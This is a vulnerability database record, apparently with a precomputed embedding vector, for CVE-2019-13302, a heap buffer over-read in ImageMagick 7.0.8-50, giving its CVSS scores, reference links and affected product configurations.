-0.017364799976348877, -0.012526909820735455, 0.012268888764083385, -0.005131388548761606, 0.006876253988593817, 0.019441867247223854, -0.0011804450768977404, -0.014926502481102943, 0.012772029265761375, 0.005334579851478338, 0.028537100180983543, -0.0034865059424191713, 0.017016470432281494, 0.014023429714143276, -0.011314211413264275, 0.0075019546784460545, 0.01034663338214159, -0.002535054227337241, 0.003460703883320093, 0.017777632921934128, 0.021944668143987656, 0.004518589004874229, -0.023905625566840172, 0.0012465629260987043, 0.00040860011358745396, 0.005057207774370909, 0.008205060847103596, 0.012797831557691097, 0.01088847778737545, -0.010256326757371426, 0.014333055354654789, -0.011385167948901653, -0.003444577567279339, -0.025040917098522186, -0.009682230651378632, 0.020009512081742287, -0.004125107545405626, -0.025750475004315376, -0.019751491025090218, 0.007721272297203541, 0.0027833993081003428, 0.016951967030763626, -0.013204214163124561, -0.012713974341750145, -0.03109150566160679, -0.02207367867231369, -0.010624006390571594, 0.009630626067519188, -0.010914279147982597, 0.024318460375070572, -0.005108811892569065, 0.013829914852976799, 0.01191410981118679, -0.014629779383540154, -0.032123588025569916, -0.005928027909249067, -0.0006265067495405674, 0.02035783976316452, 0.019441867247223854, 0.009482264518737793, -0.00608606543391943, -0.0017658298602327704, 0.003909015096724033, 0.002804363379254937, 0.010301480069756508, -0.0015473184175789356, -0.0023125114385038614, -0.0036671205889433622, -0.025737574324011803, 0.013610596768558025, -0.013520289212465286, -0.011643188074231148, 0.0017497035441920161, 0.006805298384279013, 0.011094894260168076, 0.011572232469916344, 0.0026205237954854965, 0.02233169972896576, -0.005366832483559847, -0.026498734951019287, 0.025144126266241074, 0.000793413957580924, -0.01972568966448307, -0.012346294708549976, 0.01897742971777916, -0.004899169784039259, -0.04079308733344078, -0.01273332629352808, 0.005428112577646971, 0.022357501089572906, -0.0016916488530114293, 0.02211238257586956, -0.005037855822592974, -0.00002172011045331601, -0.011778648942708969, 0.00013102618686389178, -0.0314011313021183, -0.007547107990831137, -0.002156086266040802, 0.0356326699256897, 0.02154473587870598, -0.015042612329125404, -0.010198271833360195, 0.0053507061675190926, 0.0031962324865162373, -0.012836534529924393, 0.0046379235573112965, -0.015790872275829315, 0.01038533728569746, 0.005176542326807976, 0.0019061286002397537, -0.0063924649730324745, 0.0004487142723519355, 0.026834161952137947, -0.001393312239088118, 0.004886268638074398, 0.005579699762165546, -0.0008611443918198347, -0.019480569288134575, 0.00119979667942971, 0.007218131795525551, 0.011133597232401371, 0.014552372507750988, 0.0017448655562475324, 0.014139539562165737, 0.008134105242788792, -0.03274283930659294, -0.004476660862565041, -0.007882535457611084, -0.01105619128793478, -0.00025983501109294593, 0.024821599945425987, -0.02191886678338051, -0.004276694729924202, -0.0009175864397548139, 0.0028978961054235697, -0.019364461302757263, 0.012772029265761375, -0.005044306628406048, 0.020796475932002068, 0.005563573446124792, -0.01651333086192608, 0.008134105242788792, 0.024524876847863197, 0.004189612809568644, -0.004924972075968981, -0.0150813153013587, -0.0010699799750000238, -0.014900701120495796, -0.00915328785777092, -0.020590059459209442, -0.0051120370626449585, -0.006386014632880688, 0.017235789448022842, -0.015210325829684734, -0.014900701120495796, 0.000013216006664151791, 0.02061586081981659, -0.014978107064962387, -0.00223187985830009, -0.038986943662166595, -0.011675440706312656, 0.011365815997123718, 0.015674762427806854, 0.003638093126937747, 0.001141741988249123, -0.01474588830024004, 0.016229508444666862, -0.021506033837795258, -0.0236734077334404, 0.01782923750579357, -0.019751491025090218, 0.0020915810018777847, -0.009385506622493267, -0.00010633278725435957, -0.009817691519856453, 0.022576820105314255, 0.02815006859600544, -0.014887799508869648, -0.0007514855824410915, 0.01909353956580162, 0.014694283716380596, -0.01647462695837021, 0.0012957481667399406, -0.005508744157850742, 0.0293111614882946, -0.007256834767758846, 0.0064053661189973354, -0.008734003640711308, -0.00044508586870506406, 0.003712274134159088, -0.00788898579776287, -0.013101005926728249, -0.007179428357630968, -0.021312518045306206, 0.01239789929240942, -0.0334910973906517, -0.025298938155174255, 0.027169588953256607, -0.01793244481086731, -0.02140282467007637, 0.0072503844276070595, 0.00900492537766695, 0.006556953303515911, -0.009191990830004215, -0.00408317893743515, 0.008714652620255947, -0.012126977555453777, -0.027995256707072258, 0.009288748726248741, 0.0005257173907011747, -0.012572063133120537, 0.007050418294966221, 0.03147853538393974, -0.006095741409808397, -0.016939064487814903, -0.010075711645185947, -0.00553777115419507, 0.011430321261286736, -0.01049499586224556, 0.008372774347662926, 0.0200998205691576, -0.051242928951978683, -0.022847741842269897, -0.025892386212944984, -0.047450024634599686, 0.0130881043151021, -0.004953999072313309, -0.003002716926857829, -0.004176711663603783, -0.005624853074550629, 0.01868070475757122, 0.02974979765713215, -0.005205569323152304, -0.006902056280523539, 0.0022609070874750614, -0.010211172513663769, -0.006792397238314152, 0.019777294248342514, 0.014204044826328754, -0.006211850792169571, -0.013881518505513668, -0.022809037938714027, -0.0064956736750900745, -0.005786116234958172, 0.001662621507421136, 0.004450858570635319, -0.015868278220295906, -0.023144464939832687, -0.010707862675189972, 0.003099474823102355, -0.01621660776436329, 0.03343949466943741, 0.013688002713024616, 0.007198780309408903, 0.001967408461496234, 0.00892751943320036, -0.0019367685308679938, 0.02635682374238968, 0.00608606543391943, -0.012333394028246403, -0.007134275045245886, 0.023441189900040627, 0.007314889691770077, 0.01032728236168623, 0.015442544594407082, -0.0007853507995605469, -0.016500430181622505, 0.009940250776708126, 0.025969792157411575, 0.008037347346544266, 0.0025608562864363194, 0.01084977388381958, 0.018629102036356926, -0.006792397238314152, -0.010353084653615952, -0.01017891988158226, -0.018216267228126526, 0.004208964295685291, 0.006018334999680519, 0.030136829242110252, -0.0019254802027717233, 0.016268210485577583, -0.007185879163444042, -0.021196408197283745, -0.007772876415401697, -0.01953217387199402, -0.009669329039752483, 0.005228146445006132, -0.011301310732960701, 0.006137669552117586, 0.0038283835165202618, 0.007450350560247898, -0.041850972920656204, 0.0037187247071415186, 0.01893872581422329, -0.015829576179385185, -0.025221532210707664, 0.0033542702440172434, -0.009720933623611927, 0.0007091540028341115, 0.0059183519333601, -0.022228490561246872, -0.013533190824091434, -0.0031720430124551058, 0.008385675959289074, 0.010037008672952652, -0.004496012348681688, -0.007785777561366558, 0.0066633871756494045, -0.00770837115123868, -0.0027366329450160265, 0.020074017345905304, -0.01292039081454277, -0.006257004104554653, -0.009514517150819302, -0.0100499102845788, 0.030136829242110252, -0.03297505900263786, -0.005576474592089653, -0.02558276243507862, 0.014720086008310318, 0.008050248958170414, 0.0021141578909009695, -0.004679852165281773, -0.005653880536556244, -0.013171961531043053, 0.009179090149700642, -0.010249876417219639, -0.01759701780974865, -0.017313195392489433, 0.020886782556772232, -0.004841115325689316, 0.008992024697363377, 0.008579191751778126, -0.007534207310527563, -0.014939404092729092, 0.007592261768877506, 0.009140386246144772, -0.007308438885957003, 0.008198610506951809, -0.033800724893808365, -0.016358518972992897, -0.003563912119716406, 0.00005931454506935552, -0.006940759252756834, -0.007108472753316164, 0.0025382796302437782, -0.010946531780064106, 0.007727722637355328, -0.00932100135833025, -0.006547277793288231, -0.0067020901478827, 0.021609241142868996, -0.0009724158444441855, 0.004599220585078001, 0.006721441633999348, -0.007527756504714489, -0.0067278919741511345, -0.011901209130883217, -0.015120018273591995, -0.017055174335837364, 0.013881518505513668, -0.004118656739592552, -0.006115092895925045, -0.017106778919696808, 0.021338319405913353, -0.012494657188653946, 0.020048215985298157, 0.010075711645185947, 0.015971487388014793, -0.023234771564602852, -0.00814700685441494, 0.030704474076628685, -0.00508945994079113, -0.01474588830024004, 0.014500768855214119, -0.010095063596963882, -0.009482264518737793, -0.00040779379196465015, 0.012636568397283554, -0.006102191749960184, -0.022280095145106316, -0.02191886678338051, -0.0026640647556632757, -0.004818538203835487, -0.004670176189392805, -0.011230355128645897, 0.008521136827766895, 0.024989314377307892, 0.007643865887075663, -0.0039057896938174963, 0.008230863139033318, 0.022512314841151237, 0.0025124775711447, -0.00425089243799448, 0.004605670925229788, 0.0005559541750699282, 0.008772706612944603, 0.00934035237878561, -0.005802242550998926, -0.042676638811826706, 0.0339297354221344, 0.01972568966448307, -0.005960280541330576, 0.004096080083400011, 0.0035606869496405125, 0.00631183385848999, 0.005779665894806385, -0.0017626045737415552, -0.0077406237833201885, -0.022099480032920837, -0.021841460838913918, -0.0117270452901721, 0.011920561082661152, 0.013113906607031822, 0.00223187985830009, -0.017777632921934128, 0.011004586704075336, -0.0007672086940146983, 0.007276186253875494, 0.004999152850359678, -0.014887799508869648, 0.03653574362397194, -0.010017657652497292, -0.028537100180983543, -0.021338319405913353, -0.015648961067199707, 0.015713466331362724, 0.0021012567449361086, 0.0074051967822015285, -0.015571555122733116, 0.015906982123851776, 0.02907894365489483, -0.0020254631526768208, -0.007211680989712477, -0.007211680989712477, -0.0019158043432980776, 0.006169922184199095, -0.03217519447207451, -0.005418436601758003, 0.014565274119377136, 0.008179259486496449, 0.030265839770436287, 0.011778648942708969, -0.0013062303187325597, 0.007882535457611084, 0.020254632458090782, -0.005318453535437584, -0.013417080976068974, 0.00038118541124276817, 0.010024107992649078, -0.005605501588433981, -0.0062247514724731445, -0.004341199994087219, -0.0018287224229425192, 0.02956918254494667, 0.004460534546524286, -0.011785099282860756, -0.023479891940951347, -0.01584247685968876, 0.017996950075030327, 0.014358856715261936, 0.0029333739075809717, 0.0017497035441920161, -0.024253955110907555, 0.013765409588813782, 0.0020738421007990837, -0.012023769319057465, 0.0024673237930983305, -0.013868617825210094, -0.03318147361278534, -0.01621660776436329, -0.000781722366809845, -0.01532643474638462, -0.011340013705193996, -0.01848718896508217, 0.013842815533280373, -0.017403502017259598, 0.0021189958788454533, -0.0068117487244307995, 0.01893872581422329, -0.01785503886640072, -0.013533190824091434, 0.005215245299041271, 0.005353931337594986, 0.003173655830323696, 0.01021762378513813, -0.04497302323579788, 0.011707693338394165, -0.01250755786895752, 0.006618233397603035, 0.017996950075030327, 0.005182992666959763, -0.00889526680111885, 0.011011037044227123, -0.027840442955493927, -0.004167035687714815, -0.030033620074391365, -0.0028495171573013067, -0.015352237038314342, 0.014552372507750988, -0.006269905250519514, -0.01782923750579357, 0.0064053661189973354, 0.0036542194429785013, -0.010817522183060646, 0.004247667267918587, -0.0009224243112839758, -0.03207198530435562, 0.006927858106791973, 0.0040993052534759045, -0.001596503658220172, -0.00468952814117074, -0.0003092217957600951, -0.010927180759608746, -0.0024979638401418924, 0.03158174455165863, -0.012107625603675842, 0.0016069856937974691, 0.0253505427390337, -0.017945345491170883, 0.0035381100606173277, -0.009456462226808071, -0.010759467259049416, -0.006418267264962196, 0.032381609082221985, -0.03426516056060791, -0.000014148307855066378, 0.0019738590344786644, -0.0035219837445765734, 0.013520289212465286, 0.0368453674018383, 0.0018335602944716811, 0.02747921459376812, -0.026421329006552696, 0.019403163343667984, -0.011023938655853271, 0.0018577496521174908, 0.009191990830004215, -0.004566967952996492, 0.008437279611825943, 0.0004837889864575118, -0.00665693636983633, -0.004234766121953726, 0.0028978961054235697, -0.014281450770795345, -0.009669329039752483, 0.029930412769317627, -0.016797153279185295, -0.0002535860694479197, -0.003673570929095149, 0.01625530980527401, 0.018474288284778595, -0.016061794012784958, 0.005499068181961775, -0.020035315304994583, 0.02907894365489483, 0.005505518522113562, 0.009159738197922707, -0.012023769319057465, -0.0035155334044247866, -0.017235789448022842, -0.013662201352417469, -0.005182992666959763, 0.017777632921934128, 0.018732309341430664, 0.0134041802957654, -0.016306914389133453, -0.011043289676308632, -0.0029333739075809717, -0.014952304773032665, 0.0065247006714344025, 0.0006728698499500751, 0.005408761091530323, 0.016100497916340828, -0.008295368403196335, 0.006837551016360521, 0.0016739099519327283, 0.0003201070358045399, -0.003628417383879423, 0.005744188092648983, -0.02274453267455101, 0.014178242534399033, -0.005828044842928648, -0.0022560693323612213, 0.0067020901478827, 0.021131902933120728, 0.03297505900263786, -0.0015223226509988308, -0.015468346886336803, -0.008153457194566727, 0.01032728236168623, 0.017545413225889206, 0.026859965175390244, -0.006505349185317755, 0.025556959211826324, -0.0009079106384888291, 0.0222155898809433, 0.012185031548142433, -0.005763539578765631, -0.004683077335357666, -0.02471839264035225, -0.00000388039097742876, 0.015300633385777473, 0.005176542326807976, 0.00032434018794447184, -0.006005433853715658, 0.015829576179385185, 0.0072374832816421986, 0.004208964295685291, -0.00011278330930508673, -0.02882092259824276, -0.011585133150219917, 0.02181565761566162, 0.008443730883300304, -0.007560009136795998, -0.009243594482541084, 0.006515025161206722, -0.007643865887075663, 0.004260568413883448, -0.0051475148648023605, -0.01239789929240942, -0.009701581671833992, 0.012391448952257633, 0.008772706612944603, -0.023918528109788895, 0.010275677777826786, -0.007843832485377789, -0.014397560618817806, 0.004176711663603783, 0.024408766999840736, -0.008095402270555496, 0.024395866319537163, -0.0014860385563224554, 0.01068206038326025, 0.011146497912704945, -0.0053990851156413555, 0.007560009136795998, 0.0013505775714293122, -0.01267527136951685, -0.021170606836676598, -0.00010482094512553886, -0.011830253526568413, -0.013855716213583946, 0.004931422416120768, 0.0013038113247603178, -0.002994653768837452, -0.011262607760727406, 0.012481755577027798, 0.044353775680065155, 0.016616538166999817, 0.01077236793935299, -0.015571555122733116, 0.031143110245466232, 0.0011102957651019096, -0.02215108461678028, -0.010643357411026955, -0.02487320452928543, -0.0027624350041151047, 0.005431337747722864, -0.00792123842984438, -0.02274453267455101, -0.000006239491995074786, 0.00954676978290081, -0.01850009150803089, 0.017984049394726753, -0.00620862515643239, -0.0009780600666999817, 0.006547277793288231, 0.013159060850739479, 0.006818199530243874, -0.010624006390571594, 0.012352745048701763, -0.018745210021734238, 0.0015392552595585585, -0.00017839718202594668, 0.013804112561047077, -0.037490420043468475, -0.001820659264922142, -0.004673401825129986, 0.028691912069916725, -0.008372774347662926, 0.014049232006072998, 0.04363131523132324, -0.006760144606232643, -0.011340013705193996, -0.026705151423811913, 0.016539132222533226, -0.018654903396964073, -0.003088186262175441, 0.006611782591789961, 0.011359365656971931, 0.006066713947802782, 0.009179090149700642, 0.017906643450260162, 0.005979632027447224, -0.007069769781082869, -0.0029156350065022707, -0.004602445755153894, -0.017803434282541275, 0.014371758326888084, -0.0018464613240212202, -0.025698870420455933, -0.001302198739722371, -0.03142693266272545, 0.01741640269756317, -0.0035413354635238647, 0.019377361983060837, -0.009637076407670975, -0.004025124479085207, -0.007224582135677338, -0.017429305240511894, 0.005499068181961775, 0.015790872275829315, -0.00014322169590741396, -0.0033349187579005957, 0.01441046129912138, -0.00822441279888153, 0.00900492537766695, 0.031297922134399414, 0.021867262199521065, -0.0032123588025569916, 0.005199118983000517, -0.009940250776708126, 0.0032252599485218525, 0.008721102960407734, 0.009250045754015446, 0.008327621035277843, -0.005834495183080435, -0.009907998144626617, -0.02255101688206196, -0.029853004962205887, 0.014603977091610432, -0.0003900548617821187, -0.021080298349261284, -0.011772198602557182, 0.008153457194566727, -0.007153626531362534, 0.009862844832241535, 0.012552711181342602, -0.008540487848222256, 0.0001690237841103226, 0.024628084152936935, 0.0020851304288953543, -0.0074180979281663895, -0.02288644388318062, 0.014449164271354675, 0.022770335897803307, -0.00988219678401947, 0.008804959245026112, -0.0045540668070316315, 0.00889526680111885, -0.007521306164562702, -0.00015188958786893636, -0.015674762427806854, 0.020332038402557373, -0.013791210949420929, -0.004592770244926214, 0.008134105242788792, -0.02386692352592945, -0.017429305240511894, 0.015094215981662273, -0.019106440246105194, -0.004334749188274145, -0.004918521270155907, -0.002557631116360426, -0.0030446453019976616, 0.004518589004874229, 0.0018803265411406755, 0.0017916319193318486, 0.009520967490971088, -0.025518257170915604, 0.0019657958764582872, 0.011533529497683048, -0.00018011061183642596, 0.006844001356512308, -0.026988975703716278, -0.02408624067902565, -0.0029027338605374098, 0.01224953681230545, 0.013533190824091434, 0.0016287562903016806, 0.014333055354654789, -0.00035961647517979145, -0.011520628817379475, -0.01105619128793478, -0.003263962920755148, -0.005721610970795155, -0.011172300204634666, -0.0042670187540352345, -0.021119002252817154, 0.010991686023771763, -0.011256157420575619, 0.014978107064962387, -0.0012755902716889977, -0.016951967030763626, 0.012649469077587128, -0.017287394031882286, 0.0034768301993608475, -0.01549414824694395, 0.002659226767718792, 0.012372097000479698, -0.03444577753543854, -0.005070108454674482, 0.010946531780064106, -0.007360043004155159, -0.026202011853456497, 0.008475983515381813, -0.023170266300439835, 0.008127654902637005, -0.029723994433879852, -0.011759297922253609, -0.012759128585457802, 0.008624345064163208, 0.00038985328865237534, 0.008992024697363377, 0.01998371072113514, 0.021970471367239952, -0.017068075016140938, 0.012971995398402214, -0.013152609579265118, 0.021041596308350563, -0.008301818743348122, 0.005540996324270964, 0.0027172814588993788, -0.01763572171330452, 0.005411986261606216, -0.001772280316799879, 0.020332038402557373, 0.016190804541110992, -0.0023463766556233168, 0.013662201352417469, -0.00954676978290081, 0.011997967027127743, 0.0030752853490412235, 0.011507727205753326, 0.016977768391370773, 0.0030672221910208464, 0.00485724164173007, 0.02211238257586956, -0.010901378467679024, -0.007727722637355328, 0.0016489141853526235, -0.0002939018013421446, 0.02024173177778721, 0.01206247229129076, -0.003125276882201433, -0.007482603192329407, 0.018242070451378822, 0.018474288284778595, -0.012875237502157688, 0.03049805760383606, 0.006331185344606638, -0.008030897006392479, -0.0020383642986416817, -0.008746905252337456, -0.01647462695837021, 0.006947210058569908, -0.018409783020615578, 0.015352237038314342, 0.01789374276995659, 0.010469193570315838, -0.0009579021716490388, -0.006850452162325382, -0.007643865887075663, 0.015674762427806854, -0.005521644838154316, -0.024769995361566544, -0.018138861283659935, -0.016758451238274574, -0.015648961067199707, -0.020293334499001503, -0.02132541872560978, 0.002015787409618497, -0.02120930887758732, 0.0012578513706102967, -0.0067278919741511345, -0.006053812801837921, 0.011656089685857296, 0.02464098483324051, 0.0029043464455753565, 0.004518589004874229, 0.005492617841809988, -0.007792227901518345, -0.024279756471514702, 0.008746905252337456, 0.004192837979644537, 0.017235789448022842, -0.006740793120115995, -0.014797492884099483, -0.01150127686560154, 0.017803434282541275, -0.019583778455853462, -0.00699236337095499, -0.004808862693607807, -0.02587948553264141, 0.015790872275829315, 0.004599220585078001, 0.0046088965609669685, -0.011043289676308632, 0.004392804112285376, -0.014216945506632328, -0.001975471619516611, 0.010836873203516006, -0.00759871257469058, 0.021673746407032013, 0.013210664503276348, -0.005589375272393227, 0.0025866583455353975, 0.019557975232601166, 0.019080637022852898, 0.003844509832561016, 0.018113059923052788, -0.013688002713024616, 0.011978615075349808, -0.018061455339193344, -0.0021786631550639868, -0.013352575711905956, 0.022757433354854584, 0.004870142322033644, 0.0004648405883926898, -0.019545074552297592, -0.009443560615181923, 0.004718555137515068, 0.012597865425050259, -0.03718079626560211, -0.02655033953487873, 0.018925825133919716, -0.019119340926408768, -0.017171284183859825, -0.00391546543687582, 0.011623837053775787, 0.004592770244926214, -0.019661184400320053, 0.003104312578216195, -0.00831472035497427, 0.010914279147982597, -0.004425056744366884, 0.0066440352238714695, 0.025182830169796944, 0.028124267235398293, 0.02830488048493862, 0.002417332259938121, -0.008921069093048573, -0.004566967952996492, -0.003389748279005289, 0.00831472035497427, -0.009385506622493267, -0.015132919885218143, 0.021983372047543526, 0.006618233397603035, 0.013442883267998695, 0.027788840234279633, -0.008585642091929913, -0.021596340462565422, 0.003809032030403614, -0.013584794476628304, -0.011417419649660587, 0.01055305078625679, -0.0005293457652442157, 0.0009861232247203588, -0.011598034761846066, 0.01882261596620083, -0.03300086036324501, -0.011359365656971931, 0.0014158891281113029, 0.003226872533559799, 0.013275169767439365, 0.001772280316799879, 0.021170606836676598, 0.017197085544466972, 0.008217962458729744, 0.007882535457611084, -0.0016368194483220577, -0.005763539578765631, 0.016655242070555687, 0.027866246178746223, 0.022460710257291794, 0.003228485118597746, 0.010946531780064106, -0.0061408947221934795, 0.011772198602557182, 0.008804959245026112, -0.017726028338074684, 0.012301141396164894, 0.00770837115123868, -0.012191482819616795, -0.0018319475930184126, -0.00971448328346014, 0.0200998205691576, 0.020306237041950226, -0.0008075244259089231, -0.014307253062725067, -0.026498734951019287, 0.0058667478151619434, 0.005276525393128395, 0.001115939929150045, -0.025182830169796944, -0.0022463935893028975, 0.0010175694478675723, -0.026047199964523315, -0.015481247566640377, 0.022680027410387993, 0.003941267728805542, -0.0032252599485218525, -0.004615346901118755, 0.014965206384658813, -0.009778987616300583, -0.0042670187540352345, 0.003155916929244995, 0.0019867601804435253, 0.03826448321342468, 0.006818199530243874, 0.007256834767758846, 0.0008071212796494365, -0.005979632027447224, -0.004260568413883448, -0.015313534066081047, 0.010701412335038185, 0.0016868109814822674, -0.006902056280523539, -0.009450011886656284, 0.004096080083400011, 0.016500430181622505, -0.010004756040871143, -0.0048604668118059635, 0.023879824206233025, -0.016203705221414566, -0.012688172049820423, -0.012784929946064949, -0.004570193123072386, -0.01682295650243759, 0.02856290154159069, 0.005292651709169149, 0.01570056565105915, -0.010507896542549133, -0.0161133985966444, 0.006305383052676916, 0.005653880536556244, 0.01607469469308853, 0.005282975733280182, -0.0025866583455353975, 0.007179428357630968, 0.002694704569876194, -0.0031301146373152733, 0.017016470432281494, 0.011385167948901653, 0.010295029729604721, 0.021377023309469223, -0.014165341854095459, 0.006753694266080856, -0.009275847114622593, -0.012036669999361038, 0.001909353886730969, -0.012746226973831654, 0.022718731313943863, 0.014449164271354675, -0.006037686485797167, 0.0027672729920595884, 0.0074890535324811935, 0.014423361979424953, -0.010733664967119694, 0.00469920365139842, 0.011804451234638691, -0.0043863533064723015, 0.0004029559204354882, -0.0019915979355573654, -0.0043573263101279736, -0.021312518045306206, 0.0036929226480424404, -0.004695978481322527, -0.020370742306113243, -0.010114415548741817, 0.011875406838953495, 0.007934139110147953, 0.0010852999985218048, -0.0022996102925390005, 0.0067472439259290695, 0.008714652620255947, 0.0012860724236816168, 0.0038574107456952333, -0.01034663338214159, 0.009875745512545109, -0.0003215181059204042, -0.010862675495445728, -0.03676796332001686, 0.004970125388354063, -0.007734173443168402, 0.0006656130426563323, 0.00162230571731925, 0.00537005765363574, -0.022357501089572906, 0.014978107064962387, -0.0031978453043848276, -0.008437279611825943, 0.019854700192809105, -0.005899000447243452, -0.004202513489872217, -0.006740793120115995, 0.00825666543096304, -0.011346464045345783, 0.003376847133040428, 0.022280095145106316, 0.025492453947663307, -0.0037509773392230272, -0.006276355590671301, -0.0028124265372753143, -0.01331387273967266, 0.0200998205691576, -0.015378039330244064, -0.02098999172449112, 0.007624514400959015, -0.031014099717140198, -0.011178750544786453, 0.023854022845625877, -0.003909015096724033, -0.0024963512551039457, 0.007443899754434824, 0.01060465443879366, -0.0023883050307631493, 0.003409099765121937, 0.016500430181622505, -0.000033890424674609676, -0.0011352915316820145, -0.0027963004540652037, -0.0022415556013584137, 0.005205569323152304, -0.006473096553236246, -0.01871940866112709, 0.040251243859529495, 0.004902394954115152, 0.0025060269981622696, 0.028459694236516953, 0.017197085544466972, 0.005389409139752388, -0.007611613254994154, -0.01692616380751133, 0.018113059923052788, 0.030369047075510025, 0.013688002713024616, 0.0033703965600579977, -0.0003860232827719301, -0.025144126266241074, -0.017738929018378258, -0.002089968416839838, -0.01262366771697998, 0.008443730883300304, -0.010024107992649078, 0.00665693636983633, -0.0004426669329404831, -0.0011627061758190393, 0.02587948553264141, -0.012855885550379753, 0.0035606869496405125, 0.012139878235757351, 0.012449502944946289, -0.0026914793998003006, 0.010056360624730587, -0.009056529961526394, 0.026911567896604538, -0.012604315765202045, -0.025157026946544647, 0.018448486924171448, 0.004025124479085207, 0.008779157884418964, -0.00407350342720747, 0.0019206423312425613, 0.0008079276303760707, -0.022718731313943863, 0.015274831093847752, 0.005708709824830294, -0.024060439318418503, 0.010378886014223099, 0.014474966563284397, -0.009282298386096954, 0.007785777561366558, 0.013997628353536129, -0.0009450011420994997, 0.012926842086017132, 0.013778310269117355, 0.02154473587870598, -0.000751082377973944, 0.0031591420993208885, 0.006779496558010578, 0.009256496094167233, 0.011152949184179306, -0.010449842549860477, -0.009920899756252766, -0.005263624247163534, -0.016732648015022278, -0.025453751906752586, 0.0038767624646425247, -0.003505857428535819, -0.025234432891011238, -0.019828898832201958, 0.007682569324970245, 0.014423361979424953, -0.025892386212944984, 0.029930412769317627, -0.008263115771114826, -0.010391787625849247, -0.009649978019297123, 0.006169922184199095, -0.0013650913024321198, -0.018551694229245186, 0.0037187247071415186, -0.011772198602557182, -0.003725175280123949, -0.008785608224570751, -0.0022431681863963604, 0.00329460296779871, 0.012462404556572437, -0.011765748262405396, 0.0028140393551439047, -0.01295909471809864, -0.004402479622513056, -0.0002547955373302102, -0.009753186255693436, 0.014861997216939926, 0.020048215985298157, 0.024189449846744537, -0.019622480496764183, -0.02408624067902565, -0.011856055818498135, -0.02505381964147091, -0.007805129047483206, -0.014345956034958363, -0.004108981229364872, 0.0036606700159609318, 0.013339675031602383, 0.016939064487814903, -0.00699236337095499, -0.0038574107456952333, 0.01499100774526596, 0.009553220123052597, 0.013494487851858139, -0.011398068629205227, 0.0034574787132441998, 0.003218809375539422, -0.000265076057985425, -0.01519742514938116, -0.012462404556572437, 0.00993380043655634, 0.004199288319796324, -0.0030930242501199245, 0.011875406838953495, -0.0070826709270477295, 0.003147853771224618, 0.0046088965609669685, -0.02106739766895771, 0.004060602281242609, 0.007443899754434824, 0.02244780957698822, 0.012739776633679867, -0.004189612809568644, 0.01532643474638462, 0.0009296811767853796, 0.01767442375421524, -0.013210664503276348, 0.0038122572004795074, -0.01808725669980049, 0.025814980268478394, -0.012449502944946289, -0.013429982587695122, 0.006234427448362112, -0.024524876847863197, 0.020448148250579834, 0.003921916242688894, -0.005589375272393227, 0.007850282825529575, 0.06424717605113983, -0.015274831093847752, 0.0013771860394626856, -0.014036331325769424, -0.009295199066400528, -0.01415244024246931, 0.0038251583464443684, -0.0007414066349156201, -0.03261382877826691, 0.012726875953376293, -0.0029640139546245337, 0.019248351454734802, 0.017777632921934128, -0.017235789448022842, 0.0101595688611269, 0.008050248958170414, 0.0002626570931170136, 0.0015747331781312823, 0.009533868171274662, -0.002689866814762354, 0.027505015954375267, -0.004154134541749954, 0.01474588830024004, 0.00206416635774076, 0.0045540668070316315, -0.00039892434142529964, -0.0098434928804636, 0.00620862515643239, -0.009927350096404552, -0.0006285225390456617, -0.01088847778737545, -0.0050636581145226955, 0.0038864382077008486, 0.024976413697004318, 0.004854016005992889, 0.004976576194167137, -0.014849096536636353, 0.02796945348381996, 0.010649808682501316, 0.002818877110257745, 0.014810393564403057, -0.020370742306113243, 0.008721102960407734, 0.037903252989053726, 0.0011602872982621193, -0.0188613198697567, 0.0024092691019177437, -0.0049927025102078915, 0.006402140948921442, -0.013946023769676685, -0.014255648478865623, 0.01681005395948887, -0.005915126763284206, -0.00799864437431097, 0.015313534066081047, 0.01722288876771927, -0.017068075016140938, 0.02621491253376007, -0.009811240248382092, 0.006818199530243874, -0.02457648143172264, -0.002483450109139085, 0.02505381964147091 ]
147
CVE-2019-13302
2019-07-05T01:15:10.373000
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/fourier.c in ComplexImages.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "[email protected]", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d5089971bd792311aaab5cb73460326d7ef7f32d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1597" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
